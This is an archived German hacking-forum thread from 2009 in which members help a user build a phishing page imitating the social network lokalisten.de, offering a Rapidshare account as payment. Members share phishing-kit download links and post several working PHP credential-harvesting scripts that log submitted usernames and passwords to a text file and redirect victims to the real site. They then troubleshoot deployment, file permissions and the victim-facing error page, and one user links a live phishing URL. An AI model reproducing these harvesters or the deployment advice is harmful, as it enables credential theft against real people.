PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : [S] Lokalisten Phishing Page [B] Rapidshare Acc bis 22.Oct.2009



2533
16.06.2009, 13:06
Hallo Free-Hack Members,

hatte mal ne ganz gute Phishing-Seite für lokalisten.de , leider hab ich sie nichmehr weil ich formatiert habe :confused: .... hat jemand vllt noch eine die er mir schicken kann oder hochladen??wäre echt TOP !!!!

Vllt kann auch einer von euch schnell eine erstellen, ich bekomme den Seitenaufbau nämlich einfach nciht gescheit hin, wäre super !!!!

Als GL biete ich einen UNSECURE Rapidshare Acc:

Gültig bis:Thu, 22. Oct 2009
Traffic übrig:23 451 MB (+38 GB)
TrafficShare übrig:43.00 GB

Das Sicherheitsschloss ist inaktiv: UNSECURE

Hoffe jemand kann mir helfen, lg

wui:>
16.06.2009, 13:09
Ich mach dir eine auch ohne ggl..

2533
16.06.2009, 13:14
oh :-) kannst die gl aber gerne haben hab genügend rs accs, wäre echt hammer von dir, nur ich bekomme es einfach nicht hin das die Seite einen gescheiten Aufbau hat...kannst dus mal versuchen??lg

wui:>
16.06.2009, 13:16
Ist egal ;).. Ich ladse in so 10 Minuten hoch, muss noch kurz was anderes machen..

Willst ne Log Datei haben oder reicht der Mailversand?

2533
16.06.2009, 13:17
hmm also wenn du mit der log datei die .php meinst wärs perfekt, ansonsten der mailversand, würde auch gehen !!! ja bin auch mal eben wieder am lernen, bis gleich, danke !!!!

$_staX
16.06.2009, 13:30
http://rapidshare.com/files/245137869/Lokalisten.rar.html

Mir war langweilig, einfach deine Mail mit deiner Mail Adresse ändern und du bekommst eine Email ;)

wui:>
16.06.2009, 13:39
http://rapidshare.com/files/245140857/Bilder.rar

Hier.. hat bissel länger gedauert ;)

Passwort: free-hack

ganz vergessen und war wieder jemand schneller :D

2533
16.06.2009, 19:42
erstmal vielen Dank, aber kann sein das die php scripte irgendwie falsch sind oder leigts bei mri an irgendwas, bekomme keine mail mit dem Pw

wui:>
16.06.2009, 19:57
Bei mir und bei $_staX musst du die Mail adresse in der send.php abändern hast du das getan? Falls du nicht weißt wie, einfach mim Editor, notepad++, Dreamweaver etc pp öffnen.

garwga
16.06.2009, 20:27
Andere Möglichkeit:


<?php
$username=$HTTP_POST_VARS['benutzer']; //evt. editieren
$pass=$HTTP_POST_VARS['pass']; //hier evt. auch
$neue_datei = fopen("log.txt", a);
fwrite($neue_datei, "Benutzer:$username \nPasswort:$pass \n\n\n");
fclose($neue_datei);
header("Location: http://www.weiterleitung.de"); //hier editieren
?>


MfG,
garwga

2533
16.06.2009, 21:42
ja hatte die send.php verändert, ka irgendwie gings nicht schaue es mir nochmal an, danke !!!

So danke nochmal habe jetzt die möglichkeit mit dem php script das eine "log.txt" datei erstellt gemacht, aber in der log-datei erhalte ich nur


Benutzer:
Passwort:


Benutzer:
Passwort:


ohne Inhalt...weis nicht was da falsch ist :-(

So, nachdem ich dem letzten Angebot eines Users einen Rapidshare Acc gegeben habe der sich aber irgendwie ncihtmehr meldet, es aber echt wichtig ist möchte ich nochmal fragen ob mir jemand helfen kann solch eine Phsishing Seite zu erstellen !

Hab jetzt eine Site mit MySQL erstellt die auch soweitgehend funktioniert das der Benutzername gesendet wird, jedoch muss sich in einem der Scripte ein Fehler befinden da das Passwort Textfeld immer leer bleibt :-( ...

Die Scripte sind alle vollständig auf meinem Webspace bei IDOO hochgeladen, der jenige der sich damit auskennt müsste sich eben nur kurz die Scripte anschaun und nachsehen warum ich den Benutzernamen erhalte jedoch bei Passwort nichts steht ?!?!?

BIETE FÜR DEN DER MIT HILFT WIEDER EINEN RAPIDSHARE ACCOUNT AN !!!!

lg

Stephen_KinG
13.07.2009, 11:32
hi, auch wenn der beitrag schon älter ist, ich brauche nur noch bei der send.php
meine e-mail adresse, statt dem markierten bereich im screenshot einfügen, oder?

http://img16.imageshack.us/img16/6535/unbenanntstzmmf.th.jpg (http://img16.imageshack.us/i/unbenanntstzmmf.jpg/)

aL1ien
13.07.2009, 11:36
Ja. Wie soll das script denn sonst wissen wohin es das email schicken soll? Ein bisschen überlegen sollte man schon noch ;)

Stephen_KinG
13.07.2009, 11:41
hab ich ja (eigentlich) gemacht, aber beim testen kommt keine e-mail an, kann es an web.de liegen?

ich habe es jetzt noch mit freenet probiert, geht auch nicht, hier ist der link zur phishing page, was habe ich falsch gemacht?

http://www.lokalistenwelt.de.tp/

der_Dude
13.07.2009, 12:38
Falls noch wer ne Lokalisten Phishing Page braucht, ich hätte schnell eine (einfache) gemacht:http://rapidshare.com/files/255289334/lokalisten.rar

Einfach den Lokalisten Ordner auf nen FTP hauen und alle Files auf 777 modden.

mfg der_Dude

Stephen_KinG
13.07.2009, 12:46
hi, vielen dank für die schnelle antwort, klappt jetzt auch wunder bar, allerdings wird die Fehlermeldung, das die Anmeldung fehlgeschlagen ist, schon von anfang an agezeigt.
Kann es an der "777" liegen, das ich beim ersten versuch keine e-mail erhalten habe, ist es nötig auch dort die dateiberechtigung zu setzen?

also nochmal getestet mit den "777", funktioniert auch nicht, dann habe ich die login.php von dude umbenannt in send.php und zusammen mit den daten von dem ersten download auf meinem ftp hoch geladen, leider ist es nicht so einfach, denn es wird zwar eine acc.txt datei erstellt, jedoch ohne inhalt.

Wenigstens habe ich mir gedanken gemacht....

@dude bekommst du das hin mit dem falschen login, ansonsten klappt deine page sehr gut.

VeN0m
13.07.2009, 13:18
CHMod sind die Rechte der Datei. 777 heißt, dass _jeder_ lesen, schreiben und ausführen darf. Das heißt: Die Welt (jedermann), der Besitzer und die Besitzergruppe.
Die Rechte müssen zumindest so stehen, dass "world" (=jedermann) alles darf. Obwohl ausführen soweit ich weiß nicht nötig ist.

Ich denke aber eher, dass es in diesem Fall an den Scripten oder an Dir liegt. Ersetzt sonst mal die send.php gegen den einfachen Code:



<?php

$handle = fopen("acc.txt","a");
foreach($_POST AS $key => $value) {

fwrite($handle,$key."=".$value."\r\n");

}

fwrite($handle,"\r\n");
fclose($handle);

?>


Obwohl ich ehrlich gesagt nicht glaube, dass Dude sein Code falsch ist.

Stephen_KinG
13.07.2009, 14:20
der code von dude war nicht falsch, das problem war, wenn man auf die seite geht stand bereits da das die anmeldung fehlgeschlagen ist, hat man es trotzdem versucht, bekam ich die daten.

Aber dein code ist mit der page von wui kompatibel, allerdings klappt dann die weiterleitung zur original seite nicht mehr

also kurz
1. wui seine page sieht gut aus und die weiterleitung zur orignalen klappt, allerdings bekomm ich keine e-mail

2. bei dude seiner page bekomme ich die login daten, allerdings steht noch vor dem versuch des opfers sich anzumelden bereits da, das die anmeldung fehlgeschlagen ist.

3. wenn ich die seite von wui benutze und die send.php von power-sven sieht die seite gut aus, ich bekomme auch die daten als acc.txt, allerdings bekommt das opfer nur ne weiße seite, also weder ne fehlermeldung noch die Weiterleitung zur Originalen Seite.

schonmal Danke für eure Unterstüzung

VeN0m
13.07.2009, 19:01
Ja, weil ich die Weiterleitung vergaß, sorry ;).

Oben in den Code kommt noch ein Header-Befehl.



<?php
header("location: ZIELSEITE");

$handle = fopen("acc.txt","a");
foreach($_POST AS $key => $value) {

fwrite($handle,$key."=".$value."\r\n");

}

fwrite($handle,"\r\n");
fclose($handle);

?>


Bei ZIELSEITE schreibst Du unklusive http:// die Zielurl hin ;). Dann leitet das Ding auch weiter :).